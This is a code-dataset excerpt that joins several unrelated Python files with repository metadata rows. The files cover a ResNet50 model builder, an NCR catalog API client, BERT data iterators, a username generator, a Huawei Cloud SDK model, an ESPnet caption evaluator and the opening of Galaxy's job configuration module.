block_names = ['2a', '2b', '2c', '3a', '3b', '3c', '3d', '4a', '4b', '4c', '4d', '4e', '4f', '5a', '5b', '5c'
] + ['avg_pool', 'fc1000']
block_filters = [[64, 64, 256], [128, 128, 512], [256, 256, 1024], [512, 512, 2048]]
def ResNet50(pretrained=False, end_with='fc1000', n_classes=1000, name=None):
"""Pre-trained MobileNetV1 model (static mode). Input shape [?, 224, 224, 3].
To use pretrained model, input should be in BGR format and subtracted from ImageNet mean [103.939, 116.779, 123.68].
Parameters
----------
pretrained : boolean
Whether to load pretrained weights. Default False.
    end_with : str
        The end point of the model: one of the block names above, e.g. '2a' ... '5c', 'avg_pool' or 'fc1000'.
        Default ``fc1000``, i.e. the whole model.
n_classes : int
Number of classes in final prediction.
name : None or str
Name for this model.
Examples
---------
Classify ImageNet classes, see `tutorial_models_resnet50.py`
>>> # get the whole model with pretrained weights
>>> resnet = tl.models.ResNet50(pretrained=True)
>>> # use for inferencing
>>> output = resnet(img1, is_train=False)
>>> prob = tf.nn.softmax(output)[0].numpy()
Extract the features before fc layer
>>> resnet = tl.models.ResNet50(pretrained=True, end_with='5c')
>>> output = resnet(img1, is_train=False)
Returns
-------
ResNet50 model.
"""
ni = Input([None, 224, 224, 3], name="input")
n = Conv2d(64, (7, 7), strides=(2, 2), padding='SAME', W_init=tf.initializers.he_normal(), name='conv1')(ni)
n = BatchNorm(name='bn_conv1', act='relu')(n)
n = MaxPool2d((3, 3), strides=(2, 2), name='max_pool1')(n)
for i, block_name in enumerate(block_names):
if len(block_name) == 2:
stage = int(block_name[0])
block = block_name[1]
if block == 'a':
strides = (1, 1) if stage == 2 else (2, 2)
n = conv_block(n, 3, block_filters[stage - 2], stage=stage, block=block, strides=strides)
else:
n = identity_block(n, 3, block_filters[stage - 2], stage=stage, block=block)
elif block_name == 'avg_pool':
n = GlobalMeanPool2d(name='avg_pool')(n)
elif block_name == 'fc1000':
n = Dense(n_classes, name='fc1000')(n)
if block_name == end_with:
break
network = Model(inputs=ni, outputs=n, name=name)
if pretrained:
restore_params(network)
return network
def restore_params(network, path='models'):
logging.info("Restore pre-trained parameters")
maybe_download_and_extract(
'resnet50_weights_tf_dim_ordering_tf_kernels.h5',
path,
'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/',
) # ls -al
try:
import h5py
except Exception:
raise ImportError('h5py not imported')
f = h5py.File(os.path.join(path, 'resnet50_weights_tf_dim_ordering_tf_kernels.h5'), 'r')
for layer in network.all_layers:
if len(layer.all_weights) == 0:
continue
w_names = list(f[layer.name])
params = [f[layer.name][n][:] for n in w_names]
# if 'bn' in layer.name:
# params = [x.reshape(1, 1, 1, -1) for x in params]
assign_weights(params, layer)
del params
f.close()
| 33.681373 | 120 | 0.623199 |
9e6f860b3cbecd3883c60f3f67aa318c3f97c252 | 7,201 | py | Python | code/catalogMaker.py | NCR-Corporation/sample-app-burgers | 478b18078b3e7eb217ba7baba318a30f12ae76ca | ["Apache-2.0"] | 7 | 2020-10-29T13:19:50.000Z | 2022-01-12T21:36:24.000Z | code/catalogMaker.py | NCR-Corporation/sample-app-burgers | 478b18078b3e7eb217ba7baba318a30f12ae76ca | ["Apache-2.0"] | 10 | 2020-10-30T14:23:33.000Z | 2021-08-18T19:30:12.000Z | code/catalogMaker.py | NCR-Corporation/sample-app-burgers | 478b18078b3e7eb217ba7baba318a30f12ae76ca | ["Apache-2.0"] | 5 | 2020-10-30T14:24:37.000Z | 2021-06-21T14:02:49.000Z |
from django.conf import settings
import requests
import re
from BurgersUnlimited import settings
from HMACAuth import HMACAuth
HIGHLANDS = settings.LOCATIONS['Burgers Unlimited Highlands']
SOUTHLAND = settings.LOCATIONS['Burgers Unlimited Southland']
MIDTOWN = settings.LOCATIONS ['Burgers Unlimited Midtown']
'''
Description: This function creates new items in the site catalog associated with the enterpriseId passed to this function. BEWARE: There is no delete to delete an item, you must make it as INACTIVE
Parameters:
-itemName [ The name of the item that you want to create. NOTICE: Spaces are not allowed]
-version [ Which version of the itemName is this. NOTICE: When updating, you must increase this number]
-shortDescription [ A description of the itemName]
-location [ Which site(location) is this item being added to]
-department [ Which department within the site is this location going to]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: N/A
'''
def createItem(itemName, version, shortDescription ,location, department):
url = 'https://gateway-staging.ncrcloud.com/catalog/items/%s' %(itemName)
payload = "{\"version\":%s,\"shortDescription\":{\"values\":[{\"locale\":\"en-US\",\"value\":\"%s\"}]},\"status\":\"INACTIVE\",\"merchandiseCategory\":\"%s\",\"departmentId\":\"%s\"}" %(
version, shortDescription, location, department)
r = requests.put(url, payload, auth=(HMACAuth()))
return r.json()
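# Illustrative call (item name, description and department are hypothetical):
#   createItem('CheeseBurger', 1, 'Quarter pounder with cheddar', HIGHLANDS, 'Entrees')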
'''
Description: This function returns the item details of the itemName passed
Parameters: itemName [name of the item you want information about]
Returns: returns the json of the item in question. If no results, returns nothing
'''
def getItem(itemName):
    url = 'https://gateway-staging.ncrcloud.com/catalog/items/%s' % itemName
r = requests.get(url,auth=(HMACAuth()))
return r.json()
'''
Description: This function will call the catalog bulk getItem function. It will grab all the items associated with a particular site/restaurant
Parameters: storeName [The name of the store you wish to call all the items from]
Returns: An array with the names of all the items within the storeName.
'''
def getStoreItems(storeName):
url = 'https://gateway-staging.ncrcloud.com/catalog/items?merchandiseCategoryId=%s&itemStatus=ACTIVE' % storeName
r = requests.get(url, auth=(HMACAuth()))
tempItems = r.json()
storeItems = []
for item in tempItems['pageContent']:
for nestedItem in item['itemId'].values():
name = nestedItem
department = item['departmentId']
result = {}
result.update({'name': name, 'department': department})
storeItems.append(result)
return storeItems
'''
Description: This function creates a priceItem within the catalog API. The priceItem and item are tied together by the itemCode. I am using itemName as a replacement for itemCode
Parameters:
-itemName [The name that you entered for the item, when you made it (str)]
-itemPriceId [ A unique id for the item. (str)]
-version [ Which version of the itemName is this. NOTICE: When updating, you must increase this number]
-price [How much the item will cost]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: N/A
'''
def createPrice(itemName, itemPriceId, version, price, enterpriseId):
url = 'https://gateway-staging.ncrcloud.com/catalog/item-prices/%s/%s' % (itemName, itemPriceId)
payload = "{\"version\":%s,\"price\":%s,\"currency\":\"US Dollar\",\"effectiveDate\":\"2020-07-16T18:22:05.784Z\",\"status\":\"INACTIVE\"}" %(version, price)
r = requests.put(url,payload,auth=(HMACAuth(enterpriseId)))
print(r.json)
'''
Description: This function will find the priceItem from the associated itemName
Parameters:
-itemName [The name that you entered for the item, when you made it]
-itemPriceId [The itemPriceId you entered when you created the item]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: A json of the priceItem from the requested itemName
'''
def getPrice(itemName,itemPriceId,enterpriseId):
url = 'https://gateway-staging.ncrcloud.com/catalog/item-prices/%s/%s' %(itemName, itemPriceId)
r = requests.get(url, auth=(HMACAuth(enterpriseId)))
print(r.json())
return r.json()
'''
Description: This function will get all the priceItems from the given itemNames
Parameters:
itemIds [A list of itemNames]
-enterpriseId [ The alphanumeric id associated with the location. NOTICE: This was created when the site was created. If unknown use query() within siteMaker]
Returns: A list of priceItems for the given itemNames
'''
def getAllPrices(itemIds,enterpriseId):
url = 'https://gateway-staging.ncrcloud.com/catalog/item-prices/get-multiple'
itemNames = []
for i in range(len(itemIds)):
itemNames.append(itemIds[i]['name'])
modifiedItems = createJsonString(itemNames)
payload = "{\"itemIds\":[%s]}" %modifiedItems
r = requests.post(url,payload, auth=(HMACAuth(enterpriseId)))
tempPrices = r.json()
itemsWithPrices = []
i = 0
for item in tempPrices['itemPrices']:
result = {}
price = item.get('price')
nested = item.get('priceId')
name = nested.get('itemCode')
department = -99
for collection in itemIds:
if collection['name'] == name:
department = collection['department']
price = addChange(price)
name = addSpacesInbetweenCaptialLetters(name)
if isUnique(itemsWithPrices,name):
result.update({'name': name, 'price': price, 'department': department })
itemsWithPrices.append(result)
i += 1
else:
result.update({'name': name, 'price': price})
return itemsWithPrices
'''
Description: A helper function to help the front end display the item Names correctly. The API does not currently support spaces in the itemName
Parameters: A string
Returns: The string separated on the capitals
'''
def addSpacesInbetweenCaptialLetters(str1):
return re.sub(r"(\w)([A-Z])", r"\1 \2", str1)
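# Example: addSpacesInbetweenCaptialLetters('CheeseBurger') -> 'Cheese Burger'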
'''
Description: A helper function to build json strings for the getPriceItems payload.
Parameters: items [A list of itemNames to be turned into a json string]
Returns: a string in the correct format for the getPriceItems payload.
'''
def createJsonString(items):
String = ""
for item in items:
String = String + "{\"itemCode\":\"%s\"}," %item
String =String.rstrip(',')
return String
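# Example: createJsonString(['BigBurger', 'Fries']) -> '{"itemCode":"BigBurger"},{"itemCode":"Fries"}'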
def isUnique(dict_list,item):
for d in dict_list:
if d['name'] == item:
return False
return True
def addChange(string):
    # Format the price with exactly two decimal places,
    # which also fixes the old bug with values such as .01 - 0.9 (e.g. 8.5 -> '8.50').
    return '{:.2f}'.format(float(string))
| 35.648515 | 197 | 0.699625 |
aed5e2bce0b94c3d5410f73496d834f3ee5433a3 | 4,326 | py | Python | eval/DataIter.py | DunZhang/LUSE | 5b13cc5882052dfbf0e756c5b403958b67168223 | ["MIT"] | 10 | 2021-07-31T02:50:37.000Z | 2022-03-29T06:44:50.000Z | eval/DataIter.py | DunZhang/LUSE | 5b13cc5882052dfbf0e756c5b403958b67168223 | ["MIT"] | 1 | 2021-08-01T14:36:09.000Z | 2021-08-02T02:10:37.000Z | eval/DataIter.py | DunZhang/LUSE | 5b13cc5882052dfbf0e756c5b403958b67168223 | ["MIT"] | 1 | 2022-01-26T03:05:02.000Z | 2022-01-26T03:05:02.000Z |
import random
import torch
from transformers import BertTokenizer
from collections.abc import Iterable  # collections.Iterable was removed in Python 3.10
import logging
logger = logging.getLogger("OPPOSTS")
class DataIter(Iterable):
def __init__(self):
self.swap_pair = None
def reset(self):
pass
class VecDataIter(DataIter):
""" """
def __init__(self, data_path: str, tokenizer: BertTokenizer, batch_size: int = 64, max_len: int = 128):
"""
        If label2id is not None, a cloze (fill-in-the-blank) model is used.
"""
super().__init__()
self.tokenizer = tokenizer
self.batch_size = batch_size
self.max_len = max_len
self.data_path = data_path
self.data = []
def reset(self):
logger.info("dataiter reset, 读取数据")
self.data.clear()
with open(self.data_path, "r", encoding="utf8") as fr:
for line in fr:
ss = line.strip().split("\t")
if len(ss) == 3:
self.data.append([ss[0].strip(), ss[1].strip(), int(ss[2])])
logger.info("共读取数据:{}条".format(len(self.data)))
random.shuffle(self.data)
self.data_iter = iter(self.data)
def get_steps(self):
return len(self.data) // self.batch_size
def get_batch_data(self):
batch_data = []
for i in self.data_iter:
batch_data.append(i)
if len(batch_data) == self.batch_size:
break
        # check whether a full batch was collected
if len(batch_data) == self.batch_size:
batch_sens_a = [i[0] for i in batch_data]
batch_sens_b = [i[1] for i in batch_data]
batch_labels = [[i[2]] for i in batch_data]
ipt_a = self.tokenizer.batch_encode_plus(batch_text_or_text_pairs=batch_sens_a, padding="longest",
return_tensors="pt", max_length=self.max_len, truncation=True)
ipt_b = self.tokenizer.batch_encode_plus(batch_text_or_text_pairs=batch_sens_b, padding="longest",
return_tensors="pt", max_length=self.max_len, truncation=True)
ipt = {
"labels": torch.tensor(batch_labels),
"ipt_a": ipt_a,
"ipt_b": ipt_b
}
return ipt
return None
def __iter__(self):
return self
def __next__(self):
ipts = self.get_batch_data()
if ipts is None:
raise StopIteration
else:
return ipts
class CLFDataIter(DataIter):
""" """
def __init__(self, data_path: str, tokenizer: BertTokenizer, batch_size: int = 64, max_len: int = 128):
"""
        If label2id is not None, a cloze (fill-in-the-blank) model is used.
"""
super().__init__()
self.tokenizer = tokenizer
self.batch_size = batch_size
self.max_len = max_len
self.data_path = data_path
self.data = []
def reset(self):
logger.info("dataiter reset, 读取数据")
self.data.clear()
with open(self.data_path, "r", encoding="utf8") as fr:
for line in fr:
ss = line.strip().split("\t")
if len(ss) == 2:
self.data.append([ss[0].strip(), int(ss[1])])
logger.info("共读取数据:{}条".format(len(self.data)))
random.shuffle(self.data)
self.data_iter = iter(self.data)
def get_steps(self):
return len(self.data) // self.batch_size
def get_batch_data(self):
batch_data = []
for i in self.data_iter:
batch_data.append(i)
if len(batch_data) == self.batch_size:
break
        # check whether a full batch was collected
if len(batch_data) == self.batch_size:
batch_sens = [i[0] for i in batch_data]
batch_labels = [i[1] for i in batch_data]
ipt = self.tokenizer.batch_encode_plus(batch_text_or_text_pairs=batch_sens, padding="longest",
return_tensors="pt", max_length=self.max_len, truncation=True)
ipt["labels"] = torch.tensor(batch_labels)
return ipt
return None
def __iter__(self):
return self
def __next__(self):
ipts = self.get_batch_data()
if ipts is None:
raise StopIteration
else:
return ipts
if __name__ == "__main__":
pass
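# Illustrative usage (paths, sizes and the downstream model are hypothetical):
#   tokenizer = BertTokenizer.from_pretrained('bert-base-chinese')
#   data_iter = CLFDataIter('data/dev.tsv', tokenizer, batch_size=32, max_len=64)
#   data_iter.reset()              # reads and shuffles the data; must be called before iterating
#   for batch in data_iter:
#       logits = model(**batch)    # batch holds tokenized inputs plus a 'labels' tensor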
| 31.122302 | 115 | 0.553398 |
dccd0bb58a82146f72f4c4a8f14d433bdba9d334 | 951 | py | Python | archive/resources/name_generator.py | iphilpot/DoE_Bloom_Filter | bb3c60a9679c853510233480e8876364c147838b | ["MIT"] | 1 | 2019-06-06T23:17:18.000Z | 2019-06-06T23:17:18.000Z | archive/resources/name_generator.py | iphilpot/DoE_Bloom_Filter | bb3c60a9679c853510233480e8876364c147838b | ["MIT"] | null | null | null | archive/resources/name_generator.py | iphilpot/DoE_Bloom_Filter | bb3c60a9679c853510233480e8876364c147838b | ["MIT"] | null | null | null |
#!/usr/bin/env python
family_file='familynames-usa-top1000.txt'
female_file='femalenames-usa-top1000.txt'
male_file='malenames-usa-top1000.txt'
username_file='usernames.txt'
# (female * family) + (male * family) = 2,000,000
# wc -l username.txt = 2,000,000
user_file=open(username_file, 'w')
with open(family_file) as fam_fp:
fam_line = fam_fp.readline()
while fam_line:
with open(female_file) as f_fp:
f_line = f_fp.readline()
while f_line:
f_user = f_line.strip().lower() + '.' + fam_line.lower()
user_file.write(f_user)
f_line = f_fp.readline()
with open(male_file) as m_fp:
m_line = m_fp.readline()
while m_line:
m_user = m_line.strip().lower() + '.' + fam_line.lower()
user_file.write(m_user)
m_line = m_fp.readline()
fam_line = fam_fp.readline()
user_file.close()
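# Example of the generated format (names are hypothetical): for family name 'smith',
# female name 'mary' and male name 'john', the lines 'mary.smith' and 'john.smith'
# are appended to usernames.txt.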
| 30.677419 | 72 | 0.597266 |
9eeee8ced86fa85d4f7afc7e6f6809786bb3d4b7 | 3,457 | py | Python | huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/issue_item_sf_v4_tracker.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/issue_item_sf_v4_tracker.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/issue_item_sf_v4_tracker.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z |
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class IssueItemSfV4Tracker:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'id': 'int',
'name': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name'
}
def __init__(self, id=None, name=None):
"""IssueItemSfV4Tracker - a model defined in huaweicloud sdk"""
self._id = None
self._name = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
@property
def id(self):
"""Gets the id of this IssueItemSfV4Tracker.
        Type id.
:return: The id of this IssueItemSfV4Tracker.
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this IssueItemSfV4Tracker.
        Type id.
:param id: The id of this IssueItemSfV4Tracker.
:type: int
"""
self._id = id
@property
def name(self):
"""Gets the name of this IssueItemSfV4Tracker.
        Type name.
:return: The name of this IssueItemSfV4Tracker.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this IssueItemSfV4Tracker.
        Type name.
:param name: The name of this IssueItemSfV4Tracker.
:type: str
"""
self._name = name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, IssueItemSfV4Tracker):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
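# Illustrative usage (field values are hypothetical):
#   tracker = IssueItemSfV4Tracker(id=7, name='Task')
#   tracker.to_dict()  # -> {'id': 7, 'name': 'Task'}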
| 24.34507 | 79 | 0.526179 |
8d90e562575aebd21875ea59c5394b04fc1610af | 2,604 | py | Python | egs/clotho/asr1/local/evaluate_decoded_captions.py | chintu619/espne | 785d7f64035459e316f79f2ee280d729bc76bb1e | ["Apache-2.0"] | null | null | null | egs/clotho/asr1/local/evaluate_decoded_captions.py | chintu619/espne | 785d7f64035459e316f79f2ee280d729bc76bb1e | ["Apache-2.0"] | 2 | 2021-05-27T02:23:12.000Z | 2021-06-05T15:18:23.000Z | egs/clotho/asr1/local/evaluate_decoded_captions.py | chintu619/espnet | 785d7f64035459e316f79f2ee280d729bc76bb1e | ["Apache-2.0"] | null | null | null |
import argparse
import json
import os
from eval_metrics import evaluate_metrics
def main():
parser = argparse.ArgumentParser()
parser.add_argument("decoded_json_path", type=str)
parser.add_argument("groundtruth_captions_path", type=str)
args = parser.parse_args()
gts = {}
with open(args.groundtruth_captions_path) as f:
lines = [line[:-1] for line in f.readlines()]
for line in lines:
key = line.split(' ')[0]
caption = ' '.join(line.split(' ')[1:])
fileid = key.split('_')[0]
capid = int(key[-1])
if fileid not in gts:
gts[fileid] = {'file_name': fileid}
gts[fileid][f'caption_{capid+1}'] = caption.lower()
preds = {}
with open(args.decoded_json_path) as f:
json_data = json.load(f)
for key, val in json_data['utts'].items():
fileid = key.split('_')[0]
if fileid not in preds:
preds[fileid] = {'file_name': fileid, 'caption_predicted': ''}
pred_caption = val['output'][0]['rec_text'].replace(' <eos>','').replace('<eos>','').lower().replace('▁',' ')
preds[fileid][f'caption_predicted'] = pred_caption
captions_gts = [val for _,val in gts.items()]
captions_preds = [val for _,val in preds.items()]
metrics = evaluate_metrics(captions_preds, captions_gts)
metrics_individual = {}
for metric in metrics:
for fileid,val in metrics[metric]['scores'].items():
if fileid not in metrics_individual: metrics_individual[fileid] = []
metrics_individual[fileid].append(round(val,3))
dashes = '|'.join(['{:-^10}'.format('')]*10)
headers = ['fileID','BLEU_1','BLEU_2','BLEU_3','BLEU_4','METEOR','ROUGE_L','CIDEr','SPICE','SPIDEr']
def tabled_row(arr): return '|'.join(['{:^10}'.format(x) for x in arr])
decode_dirpath = os.path.dirname(args.decoded_json_path)
caption_evalpath = os.path.join(decode_dirpath,'caption_evaluation_results.txt')
with open(caption_evalpath, 'w') as f:
f.write(f'|{dashes}|\n')
f.write(f'|{tabled_row(headers)}|\n')
f.write(f'|{dashes}|\n')
metrics_summary = ['overall']+[round(metrics[metric]['score'],3) for metric in metrics]
f.write(f'|{tabled_row(metrics_summary)}|\n')
f.write(f'|{dashes}|\n')
for fileid,score_list in metrics_individual.items():
metrics_fileid = [fileid]+score_list
f.write(f'|{tabled_row(metrics_fileid)}|\n')
f.write(f'|{dashes}|\n')
if __name__ == "__main__":
main()
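# Illustrative invocation (both paths are hypothetical):
#   python evaluate_decoded_captions.py exp/decode_dir/data.json data/eval/text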
| 41.333333 | 121 | 0.603303 |
df96bf209d7090e1df9f2553431df61e26521819 | 89,369 | py | Python | lib/galaxy/jobs/__init__.py | mmyschyshyn/Vocalaxy | 9f501b49eaa96b90a39a05c74170b5cb78d88759 | ["CC-BY-3.0"] | null | null | null | lib/galaxy/jobs/__init__.py | mmyschyshyn/Vocalaxy | 9f501b49eaa96b90a39a05c74170b5cb78d88759 | ["CC-BY-3.0"] | null | null | null | lib/galaxy/jobs/__init__.py | mmyschyshyn/Vocalaxy | 9f501b49eaa96b90a39a05c74170b5cb78d88759 | ["CC-BY-3.0"] | null | null | null |
"""
Support for running a tool in Galaxy via an internal job management system
"""
from abc import ABCMeta
from abc import abstractmethod
import time
import copy
import datetime
import galaxy
import logging
import os
import pwd
import random
import re
import shutil
import subprocess
import sys
import traceback
from galaxy import model, util
from galaxy.datatypes import metadata
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.jobs.actions.post import ActionBox
from galaxy.jobs.mapper import JobRunnerMapper
from galaxy.jobs.runners import BaseJobRunner, JobState
from galaxy.util.bunch import Bunch
from galaxy.util.expressions import ExpressionContext
from galaxy.util.json import loads
from galaxy.util import unicodify
from .output_checker import check_output
from .datasets import TaskPathRewriter
from .datasets import OutputsToWorkingDirectoryPathRewriter
from .datasets import NullDatasetPathRewriter
from .datasets import DatasetPath
log = logging.getLogger( __name__ )
DATABASE_MAX_STRING_SIZE = util.DATABASE_MAX_STRING_SIZE
DATABASE_MAX_STRING_SIZE_PRETTY = util.DATABASE_MAX_STRING_SIZE_PRETTY
# This file, if created in the job's working directory, will be used for
# setting advanced metadata properties on the job and its associated outputs.
# This interface is currently experimental, is only used by the upload tool,
# and should eventually become API'd
TOOL_PROVIDED_JOB_METADATA_FILE = 'galaxy.json'
class JobDestination( Bunch ):
"""
Provides details about where a job runs
"""
def __init__(self, **kwds):
self['id'] = None
self['url'] = None
self['tags'] = None
self['runner'] = None
self['legacy'] = False
self['converted'] = False
self['env'] = []
self['resubmit'] = []
# dict is appropriate (rather than a bunch) since keys may not be valid as attributes
self['params'] = dict()
# Use the values persisted in an existing job
if 'from_job' in kwds and kwds['from_job'].destination_id is not None:
self['id'] = kwds['from_job'].destination_id
self['params'] = kwds['from_job'].destination_params
super(JobDestination, self).__init__(**kwds)
# Store tags as a list
if self.tags is not None:
self['tags'] = [ x.strip() for x in self.tags.split(',') ]
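# Illustrative construction (id, runner, tags and params are hypothetical):
#   dest = JobDestination(id='local_small', runner='local', tags='cpu,small', params={'local_slots': '2'})
#   dest.tags  # -> ['cpu', 'small']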
class JobToolConfiguration( Bunch ):
"""
Provides details on what handler and destination a tool should use
A JobToolConfiguration will have the required attribute 'id' and optional
attributes 'handler', 'destination', and 'params'
"""
def __init__(self, **kwds):
self['handler'] = None
self['destination'] = None
self['params'] = dict()
super(JobToolConfiguration, self).__init__(**kwds)
def get_resource_group( self ):
return self.get( "resources", None )
def config_exception(e, file):
abs_path = os.path.abspath(file)
message = 'Problem parsing the XML in file %s, ' % abs_path
message += 'please correct the indicated portion of the file and restart Galaxy.'
message += str(e)
log.exception(message)
return Exception(message)
class JobConfiguration( object ):
"""A parser and interface to advanced job management features.
These features are configured in the job configuration, by default, ``job_conf.xml``
"""
DEFAULT_NWORKERS = 4
def __init__(self, app):
"""Parse the job configuration XML.
"""
self.app = app
self.runner_plugins = []
self.dynamic_params = None
self.handlers = {}
self.handler_runner_plugins = {}
self.default_handler_id = None
self.destinations = {}
self.destination_tags = {}
self.default_destination_id = None
self.tools = {}
self.resource_groups = {}
self.default_resource_group = None
self.resource_parameters = {}
self.limits = Bunch()
self.__parse_resource_parameters()
# Initialize the config
job_config_file = self.app.config.job_config_file
try:
tree = util.parse_xml(job_config_file)
self.__parse_job_conf_xml(tree)
except IOError:
log.warning( 'Job configuration "%s" does not exist, using legacy job configuration from Galaxy config file "%s" instead' % ( self.app.config.job_config_file, self.app.config.config_file ) )
self.__parse_job_conf_legacy()
except Exception as e:
raise config_exception(e, job_config_file)
def __parse_job_conf_xml(self, tree):
"""Loads the new-style job configuration from options in the job config file (by default, job_conf.xml).
:param tree: Object representing the root ``<job_conf>`` object in the job config file.
:type tree: ``xml.etree.ElementTree.Element``
"""
root = tree.getroot()
log.debug('Loading job configuration from %s' % self.app.config.job_config_file)
# Parse job plugins
plugins = root.find('plugins')
if plugins is not None:
for plugin in self.__findall_with_required(plugins, 'plugin', ('id', 'type', 'load')):
if plugin.get('type') == 'runner':
workers = plugin.get('workers', plugins.get('workers', JobConfiguration.DEFAULT_NWORKERS))
runner_kwds = self.__get_params(plugin)
runner_info = dict(id=plugin.get('id'),
load=plugin.get('load'),
workers=int(workers),
kwds=runner_kwds)
self.runner_plugins.append(runner_info)
else:
log.error('Unknown plugin type: %s' % plugin.get('type'))
for plugin in self.__findall_with_required(plugins, 'plugin', ('id', 'type')):
if plugin.get('id') == 'dynamic' and plugin.get('type') == 'runner':
self.dynamic_params = self.__get_params(plugin)
# Load tasks if configured
if self.app.config.use_tasked_jobs:
self.runner_plugins.append(dict(id='tasks', load='tasks', workers=self.app.config.local_task_queue_workers))
# Parse handlers
handlers = root.find('handlers')
if handlers is not None:
for handler in self.__findall_with_required(handlers, 'handler'):
id = handler.get('id')
if id in self.handlers:
log.error("Handler '%s' overlaps handler with the same name, ignoring" % id)
else:
log.debug("Read definition for handler '%s'" % id)
self.handlers[id] = (id,)
for plugin in handler.findall('plugin'):
if id not in self.handler_runner_plugins:
self.handler_runner_plugins[id] = []
self.handler_runner_plugins[id].append( plugin.get('id') )
if handler.get('tags', None) is not None:
for tag in [ x.strip() for x in handler.get('tags').split(',') ]:
if tag in self.handlers:
self.handlers[tag].append(id)
else:
self.handlers[tag] = [id]
# Determine the default handler(s)
self.default_handler_id = self.__get_default(handlers, self.handlers.keys())
# Parse destinations
destinations = root.find('destinations')
job_metrics = self.app.job_metrics
for destination in self.__findall_with_required(destinations, 'destination', ('id', 'runner')):
id = destination.get('id')
destination_metrics = destination.get( "metrics", None )
if destination_metrics:
if not util.asbool( destination_metrics ):
# disable
job_metrics.set_destination_instrumenter( id, None )
else:
metrics_conf_path = self.app.config.resolve_path( destination_metrics )
job_metrics.set_destination_conf_file( id, metrics_conf_path )
else:
metrics_elements = self.__findall_with_required( destination, 'job_metrics', () )
if metrics_elements:
job_metrics.set_destination_conf_element( id, metrics_elements[ 0 ] )
job_destination = JobDestination(**dict(destination.items()))
job_destination['params'] = self.__get_params(destination)
job_destination['env'] = self.__get_envs(destination)
job_destination['resubmit'] = self.__get_resubmits(destination)
self.destinations[id] = (job_destination,)
if job_destination.tags is not None:
for tag in job_destination.tags:
if tag not in self.destinations:
self.destinations[tag] = []
self.destinations[tag].append(job_destination)
# Determine the default destination
self.default_destination_id = self.__get_default(destinations, self.destinations.keys())
# Parse resources...
resources = root.find('resources')
if resources is not None:
self.default_resource_group = resources.get( "default", None )
for group in self.__findall_with_required(resources, 'group'):
id = group.get('id')
fields_str = group.get('fields', None) or group.text or ''
fields = [ f for f in fields_str.split(",") if f ]
self.resource_groups[ id ] = fields
# Parse tool mappings
tools = root.find('tools')
if tools is not None:
for tool in self.__findall_with_required(tools, 'tool'):
# There can be multiple definitions with identical ids, but different params
id = tool.get('id').lower().rstrip('/')
if id not in self.tools:
self.tools[id] = list()
self.tools[id].append(JobToolConfiguration(**dict(tool.items())))
self.tools[id][-1]['params'] = self.__get_params(tool)
types = dict(registered_user_concurrent_jobs=int,
anonymous_user_concurrent_jobs=int,
walltime=str,
output_size=util.size_to_bytes)
self.limits = Bunch(registered_user_concurrent_jobs=None,
anonymous_user_concurrent_jobs=None,
walltime=None,
walltime_delta=None,
output_size=None,
destination_user_concurrent_jobs={},
destination_total_concurrent_jobs={})
# Parse job limits
limits = root.find('limits')
if limits is not None:
for limit in self.__findall_with_required(limits, 'limit', ('type',)):
type = limit.get('type')
# concurrent_jobs renamed to destination_user_concurrent_jobs in job_conf.xml
if type in ( 'destination_user_concurrent_jobs', 'concurrent_jobs', 'destination_total_concurrent_jobs' ):
id = limit.get('tag', None) or limit.get('id')
if type == 'destination_total_concurrent_jobs':
self.limits.destination_total_concurrent_jobs[id] = int(limit.text)
else:
self.limits.destination_user_concurrent_jobs[id] = int(limit.text)
elif limit.text:
self.limits.__dict__[type] = types.get(type, str)(limit.text)
if self.limits.walltime is not None:
h, m, s = [ int( v ) for v in self.limits.walltime.split( ':' ) ]
self.limits.walltime_delta = datetime.timedelta( 0, s, 0, 0, m, h )
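        # Illustrative <limit> elements handled by the loop above:
        #   <limit type="registered_user_concurrent_jobs">2</limit>
        #   <limit type="destination_user_concurrent_jobs" id="local">1</limit>
        #   <limit type="walltime">24:00:00</limit>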
log.debug('Done loading job configuration')
def __parse_job_conf_legacy(self):
